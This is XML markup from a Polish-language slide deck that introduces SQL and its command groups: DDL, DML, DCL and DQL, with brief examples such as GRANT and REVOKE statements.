            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>) to uniwersalny język zapytań używany w relacyjnych bazach danych do tworzenia, modyfikowania oraz do umieszczania i pobierania danych z tych baz.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="3899" r="14005" t="7791"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941225" y="1525850"/>
            <a:ext cx="3969774" cy="2972550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" rotWithShape="0" algn="bl" dir="5400000" dist="19050">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="0" dir="0" dist="0" endA="0" endPos="7000" fadeDir="5400012" kx="0" rotWithShape="0" algn="bl" stPos="0" sy="-100000" ky="0"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168535"/>
            <a:ext cx="7704000" cy="332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J</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>ęzyk definiowania struktur danych - DDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (ang. Data Definition Language) - wykorzystywany do wszelkiego rodzaju operacji na tabelach, takich jak: tworzenie, modyfikacja oraz usuwanie.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Najważniejsze polecenia tej grupy to:</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b="1" lang="en" sz="1800"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (np. CREATE TABLE, CREATE DATABASE, ...) – utworzenie struktury (bazy, tabeli, indeksu itp.),</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (np. DROP TABLE, DROP DATABASE, ...) – usunięcie struktury,</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>ALTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (np. ALTER TABLE ADD COLUMN ...) – zmiana struktury (dodanie kolumny do tabeli, zmiana typu danych w kolumnie tabeli).</a:t>
            </a:r>
            <a:endParaRPr sz="18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sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Składnia SQL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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168535"/>
            <a:ext cx="7704000" cy="332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J</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>ęzyk do wybierania danych i manipulowania nimi - DML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (ang. Data Manipulation Language) - służy do manipulowania danymi umieszczonymi w tabelach, pozwala na wstawienie danych, ich prezentację, modyfikowanie oraz usuwanie.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Najważniejsze polecenia z tego zbioru to:</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b="1" lang="en" sz="1800"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – umieszczenie danych w bazie,</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – zmiana danych,</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – usunięcie danych z bazy.</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Dane tekstowe muszą być zawsze ujęte w znaki pojedynczego cudzysłowu (').</a:t>
            </a:r>
            <a:endParaRPr sz="18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sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Składnia SQL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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168535"/>
            <a:ext cx="7704000" cy="332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Język do zapewnienia bezpieczeństwa dostępu do danych - DCL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> (ang. Data Control Language) - stosowany głównie przez administratorów systemu baz danych do nadawania odpowiednich uprawnień do korzystania z bazy danych.</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Najważniejsze polecenia w tej grupie to:</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>GRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – służące do nadawania uprawnień do pojedynczych obiektów lub globalnie konkretnemu użytkownikowi (np. GRANT ALL PRIVILEGES ON EMPLOYEE TO PIOTR WITH GRANT OPTION).</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>REVOKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – służące do odbierania wskazanych uprawnień konkretnemu użytkownikowi (np. REVOKE ALL PRIVILEGES ON EMPLOYEE FROM PIOTR).</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>DENY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> – służące do zabraniania wykonywania operacji</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Składnia SQL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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1168535"/>
            <a:ext cx="7704000" cy="332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t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200"/>
              <a:t>ęzyk definiowania zapytań - DQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>(ang. Data Query Language) - używany do formułowania zapytań do baz danych. W zakres tego języka wchodzi polecenie </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2200"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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Składnia SQL</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yber-Futuristic AI Technology Thesis Defense by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="031126"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="10355F"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="3B8794"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="51AF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